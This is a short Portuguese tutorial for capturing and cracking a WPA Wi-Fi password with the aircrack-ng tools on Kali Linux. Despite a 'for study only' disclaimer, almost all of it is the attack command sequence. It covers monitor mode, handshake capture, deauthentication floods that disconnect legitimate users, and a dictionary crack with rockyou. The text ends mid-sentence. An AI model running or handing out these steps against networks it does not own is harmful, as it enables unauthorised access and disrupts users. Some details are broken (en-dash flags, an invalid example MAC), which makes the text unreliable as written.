Todo o material aqui disponibilizado,
serve apenas para estudo.
1. Abre o terminal e entra em modo superutilizador sudo -s
2. Digita ifconfig para saber o nome do roteador,
geralmente é wlan0
3. Fecha todos os processos indesejados
airmon-ng check kill
4. Colocar a placa wireless em modo monotorização
airmon-ng start wlan0
5. Descobre as informações monitorizadas
airodump-ng wlan0mon
ctrl+z para interromper processo.
6. Observa o BSSID, que é o MAC-Address do dispositivo, e insere o comando:
wash -l wlan0mon
e verifica o estado do WPS, tem de estar desbloqueado.
7. Captura as informações do roteador com
airodump-ng –bssid BSSID_DESEJADO -c CANAL_DO_ROTEADOR_DESEJADO –write NOME_ARQUIVO_PARA_GRAVAR_INFORMACOES_DO_ROTEADOR wlan0mon.
Exemplo:
airodump-ng –bssid 84:AF:1S:4F:5F:AC -c 11 –write Teste2 wlan0mon
onde
84:AF:1S:4F:5F:AC -BSSID do router
11 é o canal
Teste2 é o nome do ficheiro para guardar a informação
8. Abre outro terminal e insere:
aireplay-ng –deauth 100 -a BSSID_DESEJADO wlan0mon
Com este comando, os utilizadores autenticados desconectam-se, depois autenticam-se novamente e a senha é capturada.
9. Regressa ao terminal onde o airodump-ng está a ser executado, e se no canto superior direito estiver escrito “WPA handshake“, a senha criptografada foi capturada.
10. Esta etapa não é obrigatória. Com um ficheiro com milhões de senhas (podem ser baixadas da internet ou usar a padrão do Kali Linux chamada de rockyou, que fica localizada no diretório /usr/share/wordlists/rockyou.txt.gz.
11. Este passo é obrigatório.
O comando
aircrack-ng NOME_ARQUIVO_PARA_GRAVAR_INFORMACOES_DO_ROTEADOR -w /usr/share/wordlists/NOME_WORDLIST
irá realizar procura da senha.
No Kali Linux